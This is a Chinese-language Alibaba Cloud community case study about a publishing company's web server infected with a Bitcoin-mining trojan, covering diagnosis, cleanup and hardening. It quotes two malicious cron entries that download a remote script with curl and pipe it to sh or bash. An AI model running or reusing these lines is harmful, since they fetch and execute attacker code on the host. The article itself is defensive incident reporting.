资源消耗异常,竟是因为比特币挖矿木马-阿里云开发者社区

开发者社区> 阿里云支持与服务> 正文

资源消耗异常,竟是因为比特币挖矿木马

简介: 上周末起,大规模网络勒索袭击迅速波及全球百余国家和地区,病毒锁死用户数据和电脑文件,要用户支付价值300-600美元的比特币赎金,成为刷屏级新闻。然而你知道,除了勒索病毒,比特币还有挖矿木马吗?

上周末起,大规模网络勒索袭击迅速波及全球百余国家和地区,病毒锁死用户数据和电脑文件,要用户支付价值300-
600美元的比特币赎金,成为刷屏级新闻。
_
比特币是一种网络虚拟货币,主要基于一套密码编码、通过复杂算法产生,任何人都可以下载运行比特币客户端参与制造比特币,这个过程也被形象地称为“挖矿”。而比特币“挖矿木马”,就是由黑客通过木马控制大量肉鸡电脑,为其制造比特币的恶意程序。
2888371

                                   警方缴获的比特币“挖矿机”

阿里云服务的客户中,就有中过招的。
北京新华先锋出版科技有限公司是一家专业从事图书策划、代理出版和营销推广的现代化综合性文化产业机构,其旗下子公司北京酷读文化有限公司,负责运营网络文学网站——酷读网,签有国内知名的网络作家,颇具影响力。
在2016年11月份,网站开始出现CPU、内存资源消耗异常,网站响应速度变慢,而用户访问量没有明显变化。技术团队几经排查处理,仍不能消除故障。新华先锋希望找到专业运维人员,一来快速解决问题,恢复网站正常运营,二来长期为网站保驾护航,保障系统稳定,自身集中精力拓展业务。

多方考察,选择了阿里云生态服务合作伙伴博伟来提供服务保障。通过技术诊断,发现网站遭到了“比特币挖矿木马”的入侵。有些木马病毒的高级版本,可以篡改Linux的基础命令,技术人员很难用一般的方法找到木马进程。技术人员需要结合运维经验、网上的资料、用户故障时间点和系统log分析等综合手段才能定位问题。

新华先锋中的木马就是如此。黑客利用系统漏洞,通过web脚本植入该木马,盗用服务器资源进行比特币开采计算。通过下载并分析该木马脚本文件,博伟技术人员发现该木马修改了系统登录认证配置、计划任务、创建采矿进程进行数据接收和处理,同时伪造系统服务,充当守护进程。
l 被篡改的计划任务:
/10 * curl -fsSL http://www.haveabitchin.com/pm.sh?1116 | sh
1
/1 * root curl -fs http://101.55.126.66:8990/pm.sh | bash
2
l 木马文件:
3
l 木马守护进程:
4
l 被篡改的SSH配置:
5
博伟技术人员指导新华先锋完成数据备份,清理了木马进程、守护进程,恢复被篡改的配置文件和计划任务等,在系统恢复正常后进行了一系列加固操作:缓存数据库Redis、IP绑定/密码验证/更换端口、ROOT登录限制/密码修改、Mysql、FTP、SSH端口更换、IPtable访问控制,阿里云ECS实例的安全组IP/端口限制/快照备份。

好在该木马只是利用服务器资源进行计算,并没有盗用或毁坏用户数据,由于及时查杀木马修复漏洞,避免了用户资料泄露和加密敲诈勒索等更严重的后果。

经过此次故障处理及技术人员的日常巡检,现在用户系统运行平稳。博伟也一直在给新华先锋提供7*24小时的运维保障,让新华先锋得以专注自己的业务,在文化出版领域一展拳脚。

想要更多了解生态合作伙伴提供的服务内容,
欢迎进入阿里云官网-支持-区域服务查看!链接:https://www.aliyun.com/support/quyu

版权声明:本文中所有内容均属于阿里云开发者社区所有,任何媒体、网站或个人未经阿里云开发者社区协议授权不得转载、链接、转贴或以其他方式复制发布/发表。申请授权请邮件developerteam@list.alibaba-inc.com,已获得阿里云开发者社区协议授权的媒体、网站,在转载使用时必须注明"稿件来源:阿里云开发者社区,原文作者姓名",违者本社区将依法追究责任。 如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件至:developer2020@service.aliyun.com 进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容。

分享:

分享阿里云支持与服务团队最佳实践、经典案例与故障排查。

官方博客
文档